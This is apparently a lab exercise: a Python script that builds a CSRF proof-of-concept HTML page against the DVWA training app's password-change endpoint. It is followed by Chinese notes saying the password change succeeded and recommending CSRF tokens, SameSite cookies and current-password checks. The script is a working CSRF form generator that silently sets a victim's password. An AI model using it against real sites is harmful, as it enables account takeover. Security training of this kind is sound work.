import
time
import
simplejson as json
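def poc():
    """Write ``burp.html``, a demonstration page for the DVWA CSRF exercise.

    The hard-coded URL is split into its endpoint and its query parameters,
    the two password parameters are overridden, and, when the operator
    answers ``1`` at the prompt, an HTML form carrying the first three
    parameters as hidden inputs is written to ``burp.html`` in the current
    directory. Any other answer prints a message, waits one second and exits
    the interpreter.

    Defensive reading: the request shown here changes a password from bare
    query parameters; no anti-CSRF token and no current-password field appear
    in the URL. The generated form has no ``method`` attribute, so a browser
    submits it as GET. Endpoints of this shape are normally protected with a
    per-session CSRF token, ``SameSite`` session cookies, a state-changing
    verb other than GET, and re-entry of the current password.

    Raises:
        SystemExit: when the operator does not choose option ``1``.
        IndexError: if the URL carries fewer than three query parameters.
    """
    url = "http://a2fae7a7.ngrok.io/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change"

    # Everything after the last '?' is the query string; what precedes it is
    # the endpoint that becomes the form's action.
    pieces = url.split('?')
    values = pieces[-1]
    urltwos = "".join(pieces[:-1])

    # Parse "k=v&k=v" by hand; maxsplit=1 keeps any '=' inside a value intact.
    dumps = {}
    for line in values.split('&'):
        key, value = line.split('=', 1)
        dumps[key] = value
    discts = list(dumps)

    print('原url:', url)
    print('url原带的参数:', dumps)

    dumps['password_new'] = 'password'
    dumps['password_conf'] = 'password'
    valueswto = list(dumps.values())
    print('url更该后的参数', dumps)

    print('1.burpsuite的POC')
    user = input('请进行你的选择:')
    if user != '1':
        print('【-】抱歉你没有进行选择,退出ing...')
        time.sleep(1)
        # Same effect as the site-provided exit(), without depending on it.
        raise SystemExit

    print('burpsiuite的POC')
    # The context manager closes the file even if a write or an index lookup
    # below raises, which the explicit open()/close() pair did not guarantee.
    with open('burp.html', 'w') as burp:
        burp.write('<html>\n')
        burp.write('<body>\n')
        burp.write('<script>history.pushState("","",\'/\')</script>\n')
        burp.write('<form action="{}">\n'.format(urltwos))
        # Exactly three hidden inputs, matching the three query parameters.
        # NOTE(review): names and values are written without HTML escaping.
        for idx in range(3):
            burp.write(
                '<input type="hidden" name="{}" value="{}"/>\n'.format(
                    discts[idx], valueswto[idx]
                )
            )
        burp.write('<input type="submit" value="Submit CSRF POC"/>\n')
        burp.write('</form>\n')
        burp.write('</body>\n')
        burp.write('</html>\n')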
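# Run only when executed as a script, so that importing this module does not
# prompt on stdin or write burp.html as a side effect.
if __name__ == "__main__":
    poc()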
测试结果如下:
生成的html
打开burp.html
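密码更改成功。原因在于该请求只靠 URL 中的 password_new、password_conf、Change 三个参数就能完成改密,既没有反 CSRF 令牌,也不要求输入当前密码;防护上应加入每会话的 CSRF 令牌、为会话 Cookie 设置 SameSite,并在改密时校验当前密码。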